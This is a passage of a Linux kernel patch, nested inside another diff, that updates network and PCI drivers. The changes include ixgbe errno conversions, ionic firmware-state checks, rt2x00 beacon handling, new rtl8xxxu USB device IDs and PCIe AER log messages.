+ 	/* Setup function pointers based on detected hardware */
+@@ -3460,8 +3466,7 @@ static s32 ixgbe_reset_hw_X550em(struct ixgbe_hw *hw)
+ 
+ 	/* PHY ops must be identified and initialized prior to reset */
+ 	status = hw->phy.ops.init(hw);
+-	if (status == IXGBE_ERR_SFP_NOT_SUPPORTED ||
+-	    status == IXGBE_ERR_PHY_ADDR_INVALID)
++	if (status == -EOPNOTSUPP || status == -EFAULT)
+ 		return status;
+ 
+ 	/* start the external PHY */
+@@ -3477,7 +3482,7 @@ static s32 ixgbe_reset_hw_X550em(struct ixgbe_hw *hw)
+ 		hw->phy.sfp_setup_needed = false;
+ 	}
+ 
+-	if (status == IXGBE_ERR_SFP_NOT_SUPPORTED)
++	if (status == -EOPNOTSUPP)
+ 		return status;
+ 
+ 	/* Reset PHY */
+@@ -3501,7 +3506,7 @@ mac_reset_top:
+ 	status = hw->mac.ops.acquire_swfw_sync(hw, swfw_mask);
+ 	if (status) {
+ 		hw_dbg(hw, "semaphore failed with %d", status);
+-		return IXGBE_ERR_SWFW_SYNC;
++		return -EBUSY;
+ 	}
+ 
+ 	ctrl |= IXGBE_READ_REG(hw, IXGBE_CTRL);
+@@ -3519,7 +3524,7 @@ mac_reset_top:
+ 	}
+ 
+ 	if (ctrl & IXGBE_CTRL_RST_MASK) {
+-		status = IXGBE_ERR_RESET_FAILED;
++		status = -EIO;
+ 		hw_dbg(hw, "Reset polling failed to complete.\n");
+ 	}
+ 
+@@ -3615,7 +3620,7 @@ static s32 ixgbe_setup_fc_backplane_x550em_a(struct ixgbe_hw *hw)
+ 	/* Validate the requested mode */
+ 	if (hw->fc.strict_ieee && hw->fc.requested_mode == ixgbe_fc_rx_pause) {
+ 		hw_err(hw, "ixgbe_fc_rx_pause not valid in strict IEEE mode\n");
+-		return IXGBE_ERR_INVALID_LINK_SETTINGS;
++		return -EINVAL;
+ 	}
+ 
+ 	if (hw->fc.requested_mode == ixgbe_fc_default)
+@@ -3672,7 +3677,7 @@ static s32 ixgbe_setup_fc_backplane_x550em_a(struct ixgbe_hw *hw)
+ 		break;
+ 	default:
+ 		hw_err(hw, "Flow control param set incorrectly\n");
+-		return IXGBE_ERR_CONFIG;
++		return -EIO;
+ 	}
+ 
+ 	status = hw->mac.ops.write_iosf_sb_reg(hw,
+@@ -3768,7 +3773,7 @@ static s32 ixgbe_acquire_swfw_sync_x550em_a(struct ixgbe_hw *hw, u32 mask)
+ 			return 0;
+ 		if (hmask)
+ 			ixgbe_release_swfw_sync_X540(hw, hmask);
+-		if (status != IXGBE_ERR_TOKEN_RETRY)
++		if (status != -EAGAIN)
+ 			return status;
+ 		msleep(FW_PHY_TOKEN_DELAY);
+ 	}
+@@ -3812,7 +3817,7 @@ static s32 ixgbe_read_phy_reg_x550a(struct ixgbe_hw *hw, u32 reg_addr,
+ 	s32 status;
+ 
+ 	if (hw->mac.ops.acquire_swfw_sync(hw, mask))
+-		return IXGBE_ERR_SWFW_SYNC;
++		return -EBUSY;
+ 
+ 	status = hw->phy.ops.read_reg_mdi(hw, reg_addr, device_type, phy_data);
+ 
+@@ -3838,7 +3843,7 @@ static s32 ixgbe_write_phy_reg_x550a(struct ixgbe_hw *hw, u32 reg_addr,
+ 	s32 status;
+ 
+ 	if (hw->mac.ops.acquire_swfw_sync(hw, mask))
+-		return IXGBE_ERR_SWFW_SYNC;
++		return -EBUSY;
+ 
+ 	status = ixgbe_write_phy_reg_mdi(hw, reg_addr, device_type, phy_data);
+ 	hw->mac.ops.release_swfw_sync(hw, mask);
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc.c
+index 0bcf3e5592806..3784347b6fd88 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc.c
+@@ -2678,18 +2678,17 @@ int rvu_mbox_handler_npc_mcam_alloc_entry(struct rvu *rvu,
+ 	rsp->entry = NPC_MCAM_ENTRY_INVALID;
+ 	rsp->free_count = 0;
+ 
+-	/* Check if ref_entry is within range */
+-	if (req->priority && req->ref_entry >= mcam->bmap_entries) {
+-		dev_err(rvu->dev, "%s: reference entry %d is out of range\n",
+-			__func__, req->ref_entry);
+-		return NPC_MCAM_INVALID_REQ;
+-	}
++	/* Check if ref_entry is greater that the range
++	 * then set it to max value.
++	 */
++	if (req->ref_entry > mcam->bmap_entries)
++		req->ref_entry = mcam->bmap_entries;
+ 
+ 	/* ref_entry can't be '0' if requested priority is high.
+ 	 * Can't be last entry if requested priority is low.
+ 	 */
+ 	if ((!req->ref_entry && req->priority == NPC_MCAM_HIGHER_PRIO) ||
+-	    ((req->ref_entry == (mcam->bmap_entries - 1)) &&
++	    ((req->ref_entry == mcam->bmap_entries) &&
+ 	     req->priority == NPC_MCAM_LOWER_PRIO))
+ 		return NPC_MCAM_INVALID_REQ;
+ 
+diff --git a/drivers/net/ethernet/microchip/lan966x/lan966x_port.c b/drivers/net/ethernet/microchip/lan966x/lan966x_port.c
+index 0050fcb988b75..8cc5172833a91 100644
+--- a/drivers/net/ethernet/microchip/lan966x/lan966x_port.c
++++ b/drivers/net/ethernet/microchip/lan966x/lan966x_port.c
+@@ -168,9 +168,10 @@ static void lan966x_port_link_up(struct lan966x_port *port)
+ 	lan966x_taprio_speed_set(port, config->speed);
+ 
+ 	/* Also the GIGA_MODE_ENA(1) needs to be set regardless of the
+-	 * port speed for QSGMII ports.
++	 * port speed for QSGMII or SGMII ports.
+ 	 */
+-	if (phy_interface_num_ports(config->portmode) == 4)
++	if (phy_interface_num_ports(config->portmode) == 4 ||
++	    config->portmode == PHY_INTERFACE_MODE_SGMII)
+ 		mode = DEV_MAC_MODE_CFG_GIGA_MODE_ENA_SET(1);
+ 
+ 	lan_wr(config->duplex | mode,
+diff --git a/drivers/net/ethernet/pensando/ionic/ionic_bus_pci.c b/drivers/net/ethernet/pensando/ionic/ionic_bus_pci.c
+index ce436e97324ac..4b9caec6eb9b2 100644
+--- a/drivers/net/ethernet/pensando/ionic/ionic_bus_pci.c
++++ b/drivers/net/ethernet/pensando/ionic/ionic_bus_pci.c
+@@ -380,6 +380,10 @@ static void ionic_remove(struct pci_dev *pdev)
+ 	del_timer_sync(&ionic->watchdog_timer);
+ 
+ 	if (ionic->lif) {
++		/* prevent adminq cmds if already known as down */
++		if (test_and_clear_bit(IONIC_LIF_F_FW_RESET, ionic->lif->state))
++			set_bit(IONIC_LIF_F_FW_STOPPING, ionic->lif->state);
++
+ 		ionic_lif_unregister(ionic->lif);
+ 		ionic_devlink_unregister(ionic);
+ 		ionic_lif_deinit(ionic->lif);
+diff --git a/drivers/net/ethernet/pensando/ionic/ionic_dev.c b/drivers/net/ethernet/pensando/ionic/ionic_dev.c
+index 344a3924627d4..7adfcd7c2f3ad 100644
+--- a/drivers/net/ethernet/pensando/ionic/ionic_dev.c
++++ b/drivers/net/ethernet/pensando/ionic/ionic_dev.c
+@@ -293,6 +293,7 @@ void ionic_dev_cmd_comp(struct ionic_dev *idev, union ionic_dev_cmd_comp *comp)
+ 
+ void ionic_dev_cmd_go(struct ionic_dev *idev, union ionic_dev_cmd *cmd)
+ {
++	idev->opcode = cmd->cmd.opcode;
+ 	memcpy_toio(&idev->dev_cmd_regs->cmd, cmd, sizeof(*cmd));
+ 	iowrite32(0, &idev->dev_cmd_regs->done);
+ 	iowrite32(1, &idev->dev_cmd_regs->doorbell);
+diff --git a/drivers/net/ethernet/pensando/ionic/ionic_dev.h b/drivers/net/ethernet/pensando/ionic/ionic_dev.h
+index 13dfcf9f75dad..c10da629ef6ee 100644
+--- a/drivers/net/ethernet/pensando/ionic/ionic_dev.h
++++ b/drivers/net/ethernet/pensando/ionic/ionic_dev.h
+@@ -150,6 +150,7 @@ struct ionic_dev {
+ 	bool fw_hb_ready;
+ 	bool fw_status_ready;
+ 	u8 fw_generation;
++	u8 opcode;
+ 
+ 	u64 __iomem *db_pages;
+ 	dma_addr_t phy_db_pages;
+diff --git a/drivers/net/ethernet/pensando/ionic/ionic_lif.c b/drivers/net/ethernet/pensando/ionic/ionic_lif.c
+index f7634884c7508..fcc3faecb0600 100644
+--- a/drivers/net/ethernet/pensando/ionic/ionic_lif.c
++++ b/drivers/net/ethernet/pensando/ionic/ionic_lif.c
+@@ -3008,6 +3008,9 @@ static void ionic_lif_reset(struct ionic_lif *lif)
+ {
+ 	struct ionic_dev *idev = &lif->ionic->idev;
+ 
++	if (!ionic_is_fw_running(idev))
++		return;
++
+ 	mutex_lock(&lif->ionic->dev_cmd_lock);
+ 	ionic_dev_cmd_lif_reset(idev, lif->index);
+ 	ionic_dev_cmd_wait(lif->ionic, DEVCMD_TIMEOUT);
+diff --git a/drivers/net/ethernet/pensando/ionic/ionic_main.c b/drivers/net/ethernet/pensando/ionic/ionic_main.c
+index 79272f5f380c6..d2038ff316ca5 100644
+--- a/drivers/net/ethernet/pensando/ionic/ionic_main.c
++++ b/drivers/net/ethernet/pensando/ionic/ionic_main.c
+@@ -410,22 +410,28 @@ int ionic_adminq_wait(struct ionic_lif *lif, struct ionic_admin_ctx *ctx,
+ 				      do_msg);
+ }
+ 
+-int ionic_adminq_post_wait(struct ionic_lif *lif, struct ionic_admin_ctx *ctx)
++static int __ionic_adminq_post_wait(struct ionic_lif *lif,
++				    struct ionic_admin_ctx *ctx,
++				    const bool do_msg)
+ {
+ 	int err;
+ 
++	if (!ionic_is_fw_running(&lif->ionic->idev))
++		return 0;
++
+ 	err = ionic_adminq_post(lif, ctx);
+ 
+-	return ionic_adminq_wait(lif, ctx, err, true);
++	return ionic_adminq_wait(lif, ctx, err, do_msg);
+ }
+ 
+-int ionic_adminq_post_wait_nomsg(struct ionic_lif *lif, struct ionic_admin_ctx *ctx)
++int ionic_adminq_post_wait(struct ionic_lif *lif, struct ionic_admin_ctx *ctx)
+ {
+-	int err;
+-
+-	err = ionic_adminq_post(lif, ctx);
++	return __ionic_adminq_post_wait(lif, ctx, true);
++}
+ 
+-	return ionic_adminq_wait(lif, ctx, err, false);
++int ionic_adminq_post_wait_nomsg(struct ionic_lif *lif, struct ionic_admin_ctx *ctx)
++{
++	return __ionic_adminq_post_wait(lif, ctx, false);
+ }
+ 
+ static void ionic_dev_cmd_clean(struct ionic *ionic)
+@@ -465,7 +471,7 @@ static int __ionic_dev_cmd_wait(struct ionic *ionic, unsigned long max_seconds,
+ 	 */
+ 	max_wait = jiffies + (max_seconds * HZ);
+ try_again:
+-	opcode = readb(&idev->dev_cmd_regs->cmd.cmd.opcode);
++	opcode = idev->opcode;
+ 	start_time = jiffies;
+ 	for (fw_up = ionic_is_fw_running(idev);
+ 	     !done && fw_up && time_before(jiffies, max_wait);
+diff --git a/drivers/net/phy/at803x.c b/drivers/net/phy/at803x.c
+index edd4b1e58d965..75868e63b81bb 100644
+--- a/drivers/net/phy/at803x.c
++++ b/drivers/net/phy/at803x.c
+@@ -2051,7 +2051,7 @@ static struct phy_driver at803x_driver[] = {
+ 	.write_page		= at803x_write_page,
+ 	.get_features		= at803x_get_features,
+ 	.read_status		= at803x_read_status,
+-	.config_intr		= &at803x_config_intr,
++	.config_intr		= at803x_config_intr,
+ 	.handle_interrupt	= at803x_handle_interrupt,
+ 	.get_tunable		= at803x_get_tunable,
+ 	.set_tunable		= at803x_set_tunable,
+@@ -2081,7 +2081,7 @@ static struct phy_driver at803x_driver[] = {
+ 	.resume			= at803x_resume,
+ 	.flags			= PHY_POLL_CABLE_TEST,
+ 	/* PHY_BASIC_FEATURES */
+-	.config_intr		= &at803x_config_intr,
++	.config_intr		= at803x_config_intr,
+ 	.handle_interrupt	= at803x_handle_interrupt,
+ 	.cable_test_start	= at803x_cable_test_start,
+ 	.cable_test_get_status	= at803x_cable_test_get_status,
+@@ -2097,7 +2097,7 @@ static struct phy_driver at803x_driver[] = {
+ 	.resume			= at803x_resume,
+ 	.flags			= PHY_POLL_CABLE_TEST,
+ 	/* PHY_BASIC_FEATURES */
+-	.config_intr		= &at803x_config_intr,
++	.config_intr		= at803x_config_intr,
+ 	.handle_interrupt	= at803x_handle_interrupt,
+ 	.cable_test_start	= at803x_cable_test_start,
+ 	.cable_test_get_status	= at803x_cable_test_get_status,
+diff --git a/drivers/net/usb/ax88179_178a.c b/drivers/net/usb/ax88179_178a.c
+index 5a1bf42ce1566..d837c18874161 100644
+--- a/drivers/net/usb/ax88179_178a.c
++++ b/drivers/net/usb/ax88179_178a.c
+@@ -1315,8 +1315,6 @@ static int ax88179_bind(struct usbnet *dev, struct usb_interface *intf)
+ 
+ 	netif_set_tso_max_size(dev->net, 16384);
+ 
+-	ax88179_reset(dev);
+-
+ 	return 0;
+ }
+ 
+diff --git a/drivers/net/virtio_net.c b/drivers/net/virtio_net.c
+index 21d3461fb5d1c..45f1a871b7da8 100644
+--- a/drivers/net/virtio_net.c
++++ b/drivers/net/virtio_net.c
+@@ -3474,10 +3474,11 @@ static int virtnet_find_vqs(struct virtnet_info *vi)
+ {
+ 	vq_callback_t **callbacks;
+ 	struct virtqueue **vqs;
+-	int ret = -ENOMEM;
+-	int i, total_vqs;
+ 	const char **names;
++	int ret = -ENOMEM;
++	int total_vqs;
+ 	bool *ctx;
++	u16 i;
+ 
+ 	/* We expect 1 RX virtqueue followed by 1 TX virtqueue, followed by
+ 	 * possible N-1 RX/TX queue pairs used in multiqueue mode, followed by
+@@ -3514,8 +3515,8 @@ static int virtnet_find_vqs(struct virtnet_info *vi)
+ 	for (i = 0; i < vi->max_queue_pairs; i++) {
+ 		callbacks[rxq2vq(i)] = skb_recv_done;
+ 		callbacks[txq2vq(i)] = skb_xmit_done;
+-		sprintf(vi->rq[i].name, "input.%d", i);
+-		sprintf(vi->sq[i].name, "output.%d", i);
++		sprintf(vi->rq[i].name, "input.%u", i);
++		sprintf(vi->sq[i].name, "output.%u", i);
+ 		names[rxq2vq(i)] = vi->rq[i].name;
+ 		names[txq2vq(i)] = vi->sq[i].name;
+ 		if (ctx)
+diff --git a/drivers/net/wireless/ath/ath11k/pcic.c b/drivers/net/wireless/ath/ath11k/pcic.c
+index 380f9d37b6449..e3b65efcc8684 100644
+--- a/drivers/net/wireless/ath/ath11k/pcic.c
++++ b/drivers/net/wireless/ath/ath11k/pcic.c
+@@ -453,8 +453,6 @@ void ath11k_pcic_ext_irq_enable(struct ath11k_base *ab)
+ {
+ 	int i;
+ 
+-	set_bit(ATH11K_FLAG_EXT_IRQ_ENABLED, &ab->dev_flags);
+-
+ 	for (i = 0; i < ATH11K_EXT_IRQ_GRP_NUM_MAX; i++) {
+ 		struct ath11k_ext_irq_grp *irq_grp = &ab->ext_irq_grp[i];
+ 
+@@ -465,6 +463,8 @@ void ath11k_pcic_ext_irq_enable(struct ath11k_base *ab)
+ 		}
+ 		ath11k_pcic_ext_grp_enable(irq_grp);
+ 	}
++
++	set_bit(ATH11K_FLAG_EXT_IRQ_ENABLED, &ab->dev_flags);
+ }
+ EXPORT_SYMBOL(ath11k_pcic_ext_irq_enable);
+ 
+diff --git a/drivers/net/wireless/ath/ath9k/htc_drv_txrx.c b/drivers/net/wireless/ath/ath9k/htc_drv_txrx.c
+index 672789e3c55d0..d6a3f001dacb9 100644
+--- a/drivers/net/wireless/ath/ath9k/htc_drv_txrx.c
++++ b/drivers/net/wireless/ath/ath9k/htc_drv_txrx.c
+@@ -652,9 +652,10 @@ void ath9k_htc_txstatus(struct ath9k_htc_priv *priv, void *wmi_event)
+ 	struct ath9k_htc_tx_event *tx_pend;
+ 	int i;
+ 
+-	for (i = 0; i < txs->cnt; i++) {
+-		WARN_ON(txs->cnt > HTC_MAX_TX_STATUS);
++	if (WARN_ON_ONCE(txs->cnt > HTC_MAX_TX_STATUS))
++		return;
+ 
++	for (i = 0; i < txs->cnt; i++) {
+ 		__txs = &txs->txstatus[i];
+ 
+ 		skb = ath9k_htc_tx_get_packet(priv, __txs);
+diff --git a/drivers/net/wireless/ralink/rt2x00/rt2800lib.c b/drivers/net/wireless/ralink/rt2x00/rt2800lib.c
+index 12b700c7b9c3b..517d9023aae3d 100644
+--- a/drivers/net/wireless/ralink/rt2x00/rt2800lib.c
++++ b/drivers/net/wireless/ralink/rt2x00/rt2800lib.c
+@@ -8672,7 +8672,7 @@ static void rt2800_rxdcoc_calibration(struct rt2x00_dev *rt2x00dev)
+ 	rt2800_rfcsr_write_bank(rt2x00dev, 5, 4, saverfb5r4);
+ 	rt2800_rfcsr_write_bank(rt2x00dev, 7, 4, saverfb7r4);
+ 
+-	rt2800_bbp_write(rt2x00dev, 158, 141);
++	rt2800_bbp_write(rt2x00dev, 158, 140);
+ 	bbpreg = rt2800_bbp_read(rt2x00dev, 159);
+ 	bbpreg = bbpreg & (~0x40);
+ 	rt2800_bbp_write(rt2x00dev, 159, bbpreg);
+diff --git a/drivers/net/wireless/ralink/rt2x00/rt2x00dev.c b/drivers/net/wireless/ralink/rt2x00/rt2x00dev.c
+index 9a9cfd0ce402d..00b945053e199 100644
+--- a/drivers/net/wireless/ralink/rt2x00/rt2x00dev.c
++++ b/drivers/net/wireless/ralink/rt2x00/rt2x00dev.c
+@@ -101,6 +101,7 @@ void rt2x00lib_disable_radio(struct rt2x00_dev *rt2x00dev)
+ 	rt2x00link_stop_tuner(rt2x00dev);
+ 	rt2x00queue_stop_queues(rt2x00dev);
+ 	rt2x00queue_flush_queues(rt2x00dev, true);
++	rt2x00queue_stop_queue(rt2x00dev->bcn);
+ 
+ 	/*
+ 	 * Disable radio.
+@@ -1286,6 +1287,7 @@ int rt2x00lib_start(struct rt2x00_dev *rt2x00dev)
+ 	rt2x00dev->intf_ap_count = 0;
+ 	rt2x00dev->intf_sta_count = 0;
+ 	rt2x00dev->intf_associated = 0;
++	rt2x00dev->intf_beaconing = 0;
+ 
+ 	/* Enable the radio */
+ 	retval = rt2x00lib_enable_radio(rt2x00dev);
+@@ -1312,6 +1314,7 @@ void rt2x00lib_stop(struct rt2x00_dev *rt2x00dev)
+ 	rt2x00dev->intf_ap_count = 0;
+ 	rt2x00dev->intf_sta_count = 0;
+ 	rt2x00dev->intf_associated = 0;
++	rt2x00dev->intf_beaconing = 0;
+ }
+ 
+ static inline void rt2x00lib_set_if_combinations(struct rt2x00_dev *rt2x00dev)
+diff --git a/drivers/net/wireless/ralink/rt2x00/rt2x00mac.c b/drivers/net/wireless/ralink/rt2x00/rt2x00mac.c
+index 4202c65177839..75fda72c14ca9 100644
+--- a/drivers/net/wireless/ralink/rt2x00/rt2x00mac.c
++++ b/drivers/net/wireless/ralink/rt2x00/rt2x00mac.c
+@@ -598,6 +598,17 @@ void rt2x00mac_bss_info_changed(struct ieee80211_hw *hw,
+ 	 */
+ 	if (changes & BSS_CHANGED_BEACON_ENABLED) {
+ 		mutex_lock(&intf->beacon_skb_mutex);
++
++		/*
++		 * Clear the 'enable_beacon' flag and clear beacon because
++		 * the beacon queue has been stopped after hardware reset.
++		 */
++		if (test_bit(DEVICE_STATE_RESET, &rt2x00dev->flags) &&
++		    intf->enable_beacon) {
++			intf->enable_beacon = false;
++			rt2x00queue_clear_beacon(rt2x00dev, vif);
++		}
++
+ 		if (!bss_conf->enable_beacon && intf->enable_beacon) {
+ 			rt2x00dev->intf_beaconing--;
+ 			intf->enable_beacon = false;
+diff --git a/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_core.c b/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_core.c
+index 3a9fa3ff37acc..6dd5ec1e4d8c3 100644
+--- a/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_core.c
++++ b/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_core.c
+@@ -7030,6 +7030,18 @@ static const struct usb_device_id dev_table[] = {
+ 	.driver_info = (unsigned long)&rtl8192eu_fops},
+ {USB_DEVICE_AND_INTERFACE_INFO(USB_VENDOR_ID_REALTEK, 0x818c, 0xff, 0xff, 0xff),
+ 	.driver_info = (unsigned long)&rtl8192eu_fops},
++/* D-Link DWA-131 rev C1 */
++{USB_DEVICE_AND_INTERFACE_INFO(0x2001, 0x3312, 0xff, 0xff, 0xff),
++	.driver_info = (unsigned long)&rtl8192eu_fops},
++/* TP-Link TL-WN8200ND V2 */
++{USB_DEVICE_AND_INTERFACE_INFO(0x2357, 0x0126, 0xff, 0xff, 0xff),
++	.driver_info = (unsigned long)&rtl8192eu_fops},
++/* Mercusys MW300UM */
++{USB_DEVICE_AND_INTERFACE_INFO(0x2c4e, 0x0100, 0xff, 0xff, 0xff),
++	.driver_info = (unsigned long)&rtl8192eu_fops},
++/* Mercusys MW300UH */
++{USB_DEVICE_AND_INTERFACE_INFO(0x2c4e, 0x0104, 0xff, 0xff, 0xff),
++	.driver_info = (unsigned long)&rtl8192eu_fops},
+ #endif
+ { }
+ };
+diff --git a/drivers/net/wireless/realtek/rtlwifi/rtl8723ae/phy.c b/drivers/net/wireless/realtek/rtlwifi/rtl8723ae/phy.c
+index fe9b407dc2aff..71e29b103da5a 100644
+--- a/drivers/net/wireless/realtek/rtlwifi/rtl8723ae/phy.c
++++ b/drivers/net/wireless/realtek/rtlwifi/rtl8723ae/phy.c
+@@ -49,7 +49,7 @@ u32 rtl8723e_phy_query_rf_reg(struct ieee80211_hw *hw,
+ 							    rfpath, regaddr);
+ 	}
+ 
+-	bitshift = rtl8723_phy_calculate_bit_shift(bitmask);
++	bitshift = calculate_bit_shift(bitmask);
+ 	readback_value = (original_value & bitmask) >> bitshift;
+ 
+ 	spin_unlock(&rtlpriv->locks.rf_lock);
+@@ -80,7 +80,7 @@ void rtl8723e_phy_set_rf_reg(struct ieee80211_hw *hw,
+ 			original_value = rtl8723_phy_rf_serial_read(hw,
+ 								    rfpath,
+ 								    regaddr);
+-			bitshift = rtl8723_phy_calculate_bit_shift(bitmask);
++			bitshift = calculate_bit_shift(bitmask);
+ 			data =
+ 			    ((original_value & (~bitmask)) |
+ 			     (data << bitshift));
+@@ -89,7 +89,7 @@ void rtl8723e_phy_set_rf_reg(struct ieee80211_hw *hw,
+ 		rtl8723_phy_rf_serial_write(hw, rfpath, regaddr, data);
+ 	} else {
+ 		if (bitmask != RFREG_OFFSET_MASK) {
+-			bitshift = rtl8723_phy_calculate_bit_shift(bitmask);
++			bitshift = calculate_bit_shift(bitmask);
+ 			data =
+ 			    ((original_value & (~bitmask)) |
+ 			     (data << bitshift));
+diff --git a/drivers/net/wireless/realtek/rtlwifi/rtl8723be/phy.c b/drivers/net/wireless/realtek/rtlwifi/rtl8723be/phy.c
+index 2b9313cb93dbd..094cb36153f5a 100644
+--- a/drivers/net/wireless/realtek/rtlwifi/rtl8723be/phy.c
++++ b/drivers/net/wireless/realtek/rtlwifi/rtl8723be/phy.c
+@@ -41,7 +41,7 @@ u32 rtl8723be_phy_query_rf_reg(struct ieee80211_hw *hw, enum radio_path rfpath,
+ 	spin_lock(&rtlpriv->locks.rf_lock);
+ 
+ 	original_value = rtl8723_phy_rf_serial_read(hw, rfpath, regaddr);
+-	bitshift = rtl8723_phy_calculate_bit_shift(bitmask);
++	bitshift = calculate_bit_shift(bitmask);
+ 	readback_value = (original_value & bitmask) >> bitshift;
+ 
+ 	spin_unlock(&rtlpriv->locks.rf_lock);
+@@ -68,7 +68,7 @@ void rtl8723be_phy_set_rf_reg(struct ieee80211_hw *hw, enum radio_path path,
+ 	if (bitmask != RFREG_OFFSET_MASK) {
+ 			original_value = rtl8723_phy_rf_serial_read(hw, path,
+ 								    regaddr);
+-			bitshift = rtl8723_phy_calculate_bit_shift(bitmask);
++			bitshift = calculate_bit_shift(bitmask);
+ 			data = ((original_value & (~bitmask)) |
+ 				(data << bitshift));
+ 		}
+diff --git a/drivers/net/wireless/silabs/wfx/sta.c b/drivers/net/wireless/silabs/wfx/sta.c
+index 626dfb4b7a55d..073e870b26415 100644
+--- a/drivers/net/wireless/silabs/wfx/sta.c
++++ b/drivers/net/wireless/silabs/wfx/sta.c
+@@ -354,29 +354,38 @@ static int wfx_upload_ap_templates(struct wfx_vif *wvif)
+ 	return 0;
+ }
+ 
+-static void wfx_set_mfp_ap(struct wfx_vif *wvif)
++static int wfx_set_mfp_ap(struct wfx_vif *wvif)
+ {
+ 	struct ieee80211_vif *vif = wvif_to_vif(wvif);
+ 	struct sk_buff *skb = ieee80211_beacon_get(wvif->wdev->hw, vif, 0);
+ 	const int ieoffset = offsetof(struct ieee80211_mgmt, u.beacon.variable);
+-	const u16 *ptr = (u16 *)cfg80211_find_ie(WLAN_EID_RSN, skb->data + ieoffset,
+-						 skb->len - ieoffset);
+ 	const int pairwise_cipher_suite_count_offset = 8 / sizeof(u16);
+ 	const int pairwise_cipher_suite_size = 4 / sizeof(u16);
+ 	const int akm_suite_size = 4 / sizeof(u16);
++	const u16 *ptr;
+ 
+-	if (ptr) {
+-		ptr += pairwise_cipher_suite_count_offset;
+-		if (WARN_ON(ptr > (u16 *)skb_tail_pointer(skb)))
+-			return;
+-		ptr += 1 + pairwise_cipher_suite_size * *ptr;
+-		if (WARN_ON(ptr > (u16 *)skb_tail_pointer(skb)))
+-			return;
+-		ptr += 1 + akm_suite_size * *ptr;
+-		if (WARN_ON(ptr > (u16 *)skb_tail_pointer(skb)))
+-			return;
+-		wfx_hif_set_mfp(wvif, *ptr & BIT(7), *ptr & BIT(6));
+-	}
++	if (unlikely(!skb))
++		return -ENOMEM;
++
++	ptr = (u16 *)cfg80211_find_ie(WLAN_EID_RSN, skb->data + ieoffset,
++				      skb->len - ieoffset);
++	if (unlikely(!ptr))
++		return -EINVAL;
++
++	ptr += pairwise_cipher_suite_count_offset;
++	if (WARN_ON(ptr > (u16 *)skb_tail_pointer(skb)))
++		return -EINVAL;
++
++	ptr += 1 + pairwise_cipher_suite_size * *ptr;
++	if (WARN_ON(ptr > (u16 *)skb_tail_pointer(skb)))
++		return -EINVAL;
++
++	ptr += 1 + akm_suite_size * *ptr;
++	if (WARN_ON(ptr > (u16 *)skb_tail_pointer(skb)))
++		return -EINVAL;
++
++	wfx_hif_set_mfp(wvif, *ptr & BIT(7), *ptr & BIT(6));
++	return 0;
+ }
+ 
+ int wfx_start_ap(struct ieee80211_hw *hw, struct ieee80211_vif *vif,
+@@ -394,8 +403,7 @@ int wfx_start_ap(struct ieee80211_hw *hw, struct ieee80211_vif *vif,
+ 	ret = wfx_hif_start(wvif, &vif->bss_conf, wvif->channel);
+ 	if (ret > 0)
+ 		return -EIO;
+-	wfx_set_mfp_ap(wvif);
+-	return ret;
++	return wfx_set_mfp_ap(wvif);
+ }
+ 
+ void wfx_stop_ap(struct ieee80211_hw *hw, struct ieee80211_vif *vif,
+diff --git a/drivers/pci/pci.h b/drivers/pci/pci.h
+index ed6d75d138c7a..e1d02b7c60294 100644
+--- a/drivers/pci/pci.h
++++ b/drivers/pci/pci.h
+@@ -274,7 +274,7 @@ void pci_bus_put(struct pci_bus *bus);
+ 
+ /* PCIe speed to Mb/s reduced by encoding overhead */
+ #define PCIE_SPEED2MBS_ENC(speed) \
+-	((speed) == PCIE_SPEED_64_0GT ? 64000*128/130 : \
++	((speed) == PCIE_SPEED_64_0GT ? 64000*1/1 : \
+ 	 (speed) == PCIE_SPEED_32_0GT ? 32000*128/130 : \
+ 	 (speed) == PCIE_SPEED_16_0GT ? 16000*128/130 : \
+ 	 (speed) == PCIE_SPEED_8_0GT  ?  8000*128/130 : \
+diff --git a/drivers/pci/pcie/aer.c b/drivers/pci/pcie/aer.c
+index e2d8a74f83c34..5426f450ce919 100644
+--- a/drivers/pci/pcie/aer.c
++++ b/drivers/pci/pcie/aer.c
+@@ -748,7 +748,7 @@ static void aer_print_port_info(struct pci_dev *dev, struct aer_err_info *info)
+ 	u8 bus = info->id >> 8;
+ 	u8 devfn = info->id & 0xff;
+ 
+-	pci_info(dev, "%s%s error received: %04x:%02x:%02x.%d\n",
++	pci_info(dev, "%s%s error message received from %04x:%02x:%02x.%d\n",
+ 		 info->multi_error_valid ? "Multiple " : "",
+ 		 aer_error_severity_string[info->severity],
+ 		 pci_domain_nr(dev->bus), bus, PCI_SLOT(devfn),
+@@ -936,7 +936,12 @@ static bool find_source_device(struct pci_dev *parent,
+ 		pci_walk_bus(parent->subordinate, find_device_iter, e_info);
+ 
+ 	if (!e_info->error_dev_num) {
+-		pci_info(parent, "can't find device of ID%04x\n", e_info->id);
++		u8 bus = e_info->id >> 8;
++		u8 devfn = e_info->id & 0xff;
++
++		pci_info(parent, "found no error details for %04x:%02x:%02x.%d\n",
++			 pci_domain_nr(parent->bus), bus, PCI_SLOT(devfn),
++			 PCI_FUNC(devfn));
+ 		return false;
+ 	}
+ 	return true;
+diff --git a/drivers/pci/quirks.c b/drivers/pci/quirks.c
+index 8765544bac35c..51d634fbdfb8e 100644
+--- a/drivers/pci/quirks.c
++++ b/drivers/pci/quirks.c
+@@ -607,10 +607,13 @@ static void quirk_amd_dwc_class(struct pci_dev *pdev)
+ {
+ 	u32 class = pdev->class;
+ 
+-	/* Use "USB Device (not host controller)" class */
+-	pdev->class = PCI_CLASS_SERIAL_USB_DEVICE;
+-	pci_info(pdev, "PCI class overridden (%#08x -> %#08x) so dwc3 driver can claim this instead of xhci\n",
+-		 class, pdev->class);
++	if (class != PCI_CLASS_SERIAL_USB_DEVICE) {
++		/* Use "USB Device (not host controller)" class */
++		pdev->class = PCI_CLASS_SERIAL_USB_DEVICE;
++		pci_info(pdev,
++			"PCI class overridden (%#08x -> %#08x) so dwc3 driver can claim this instead of xhci\n",
++			class, pdev->class);
++	}
+ }
+ DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_AMD, PCI_DEVICE_ID_AMD_NL_USB,
+ 		quirk_amd_dwc_class);
